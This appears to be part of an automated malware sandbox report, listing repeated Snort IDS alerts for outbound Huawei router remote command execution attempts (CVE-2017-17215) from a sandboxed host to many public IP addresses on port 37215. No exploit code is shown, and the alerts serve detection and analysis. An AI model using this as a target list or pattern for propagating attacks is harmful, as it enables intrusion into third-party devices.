            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:44190 -> 41.125.79.202:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:33286 -> 41.160.209.172:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:33286 -> 41.160.209.172:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:39464 -> 171.105.73.42:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:39464 -> 171.105.73.42:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:56114 -> 157.69.1.46:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:56114 -> 157.69.1.46:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:49102 -> 197.219.172.229:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:49102 -> 197.219.172.229:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:42878 -> 41.92.51.99:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:42878 -> 41.92.51.99:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:56858 -> 197.9.214.92:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:56858 -> 197.9.214.92:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:53276 -> 41.116.161.45:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:53276 -> 41.116.161.45:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:46038 -> 157.74.116.21:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:46038 -> 157.74.116.21:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:50856 -> 41.96.135.131:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:50856 -> 41.96.135.131:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:47874 -> 157.222.233.109:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:47874 -> 157.222.233.109:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:45200 -> 157.223.170.191:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:45200 -> 157.223.170.191:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:51392 -> 197.26.77.230:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:51392 -> 197.26.77.230:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:47204 -> 157.136.233.176:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:47204 -> 157.136.233.176:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:47346 -> 62.201.212.55:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:47346 -> 62.201.212.55:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:59596 -> 41.163.31.147:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:59596 -> 41.163.31.147:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:37594 -> 157.142.30.251:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:37594 -> 157.142.30.251:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:46192 -> 41.232.135.41:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:46192 -> 41.232.135.41:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:49814 -> 51.169.132.171:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:49814 -> 51.169.132.171:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:39914 -> 197.247.43.197:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:39914 -> 197.247.43.197:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:52806 -> 197.177.82.109:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:52806 -> 197.177.82.109:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:48748 -> 72.72.92.151:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:48748 -> 72.72.92.151:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:46944 -> 41.103.61.133:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:46944 -> 41.103.61.133:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:53392 -> 157.157.15.228:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:53392 -> 157.157.15.228:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:33544 -> 41.54.67.167:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:33544 -> 41.54.67.167:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:45848 -> 41.174.82.44:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:45848 -> 41.174.82.44:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:54896 -> 197.146.73.28:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:54896 -> 197.146.73.28:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:44162 -> 41.29.218.164:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:44162 -> 41.29.218.164:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:44038 -> 157.218.14.173:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:44038 -> 157.218.14.173:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:49574 -> 41.82.12.158:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:49574 -> 41.82.12.158:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:49440 -> 123.245.125.182:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:49440 -> 123.245.125.182:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:55586 -> 197.63.179.198:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:55586 -> 197.63.179.198:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:55538 -> 41.184.48.183:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:55538 -> 41.184.48.183:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:42010 -> 119.15.85.74:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:42010 -> 119.15.85.74:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:34586 -> 100.166.56.23:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:34586 -> 100.166.56.23:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:36636 -> 91.124.146.35:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:36636 -> 91.124.146.35:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:47988 -> 41.176.113.165:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:47988 -> 41.176.113.165:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:60330 -> 197.51.251.230:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:60330 -> 197.51.251.230:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:43648 -> 41.112.111.96:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:43648 -> 41.112.111.96:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:34494 -> 197.20.75.8:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:34494 -> 197.20.75.8:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:39574 -> 66.33.91.250:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:39574 -> 66.33.91.250:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:51936 -> 197.236.230.200:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:51936 -> 197.236.230.200:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:33566 -> 197.205.48.62:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:33566 -> 197.205.48.62:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:56194 -> 41.14.108.42:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:56194 -> 41.14.108.42:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:54928 -> 157.195.67.207:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:54928 -> 157.195.67.207:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:42350 -> 126.114.181.172:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:42350 -> 126.114.181.172:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:49688 -> 197.63.145.44:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:49688 -> 197.63.145.44:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:58368 -> 197.242.106.124:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:58368 -> 197.242.106.124:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:42776 -> 41.39.227.79:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:42776 -> 41.39.227.79:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:54422 -> 157.15.248.50:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:54422 -> 157.15.248.50:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:37020 -> 41.207.24.255:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:37020 -> 41.207.24.255:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:35840 -> 197.121.243.38:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:35840 -> 197.121.243.38:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:45030 -> 197.54.19.73:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:45030 -> 197.54.19.73:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:49472 -> 41.219.28.68:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:49472 -> 41.219.28.68:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:51310 -> 197.91.103.91:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:51310 -> 197.91.103.91:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:49818 -> 41.236.71.160:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:49818 -> 41.236.71.160:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:48610 -> 41.253.29.236:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:48610 -> 41.253.29.236:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:54640 -> 197.148.164.37:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:54640 -> 197.148.164.37:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:53154 -> 41.251.114.113:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:53154 -> 41.251.114.113:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:37988 -> 143.243.241.105:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:37988 -> 143.243.241.105:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:47640 -> 157.123.213.129:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:47640 -> 157.123.213.129:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:53704 -> 179.45.46.38:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:53704 -> 179.45.46.38:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:41990 -> 157.208.164.44:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:41990 -> 157.208.164.44:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:45130 -> 41.103.229.148:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:45130 -> 41.103.229.148:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:55460 -> 197.76.2.214:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:55460 -> 197.76.2.214:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:55888 -> 41.117.251.205:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:55888 -> 41.117.251.205:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:36414 -> 197.168.225.245:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:36414 -> 197.168.225.245:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:38998 -> 157.156.65.193:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:38998 -> 157.156.65.193:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:39020 -> 197.206.192.38:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:39020 -> 197.206.192.38:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:33998 -> 157.123.255.218:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:33998 -> 157.123.255.218:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:45750 -> 157.224.24.94:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:45750 -> 157.224.24.94:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:49568 -> 157.228.120.204:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:49568 -> 157.228.120.204:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:42320 -> 197.76.141.147:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:42320 -> 197.76.141.147:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:37058 -> 197.139.59.95:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:37058 -> 197.139.59.95:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:44614 -> 157.238.35.149:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:44614 -> 157.238.35.149:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:37934 -> 197.15.230.14:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:37934 -> 197.15.230.14:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:56350 -> 118.232.46.164:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:56350 -> 118.232.46.164:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:56176 -> 41.227.92.170:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:56176 -> 41.227.92.170:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:42132 -> 41.66.66.67:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:42132 -> 41.66.66.67:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:37312 -> 157.63.75.168:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:37312 -> 157.63.75.168:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:55074 -> 41.117.178.112:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:55074 -> 41.117.178.112:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:52732 -> 197.85.110.156:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:52732 -> 197.85.110.156:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:41292 -> 41.10.228.229:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:41292 -> 41.10.228.229:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:42562 -> 197.101.122.28:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:42562 -> 197.101.122.28:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:42476 -> 184.22.80.61:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:42476 -> 184.22.80.61:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:49494 -> 157.163.151.52:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:49494 -> 157.163.151.52:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:46042 -> 197.187.154.106:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:46042 -> 197.187.154.106:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:40214 -> 197.167.106.100:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:40214 -> 197.167.106.100:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:60402 -> 41.92.173.159:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:60402 -> 41.92.173.159:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:36166 -> 148.86.24.181:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:36166 -> 148.86.24.181:37215
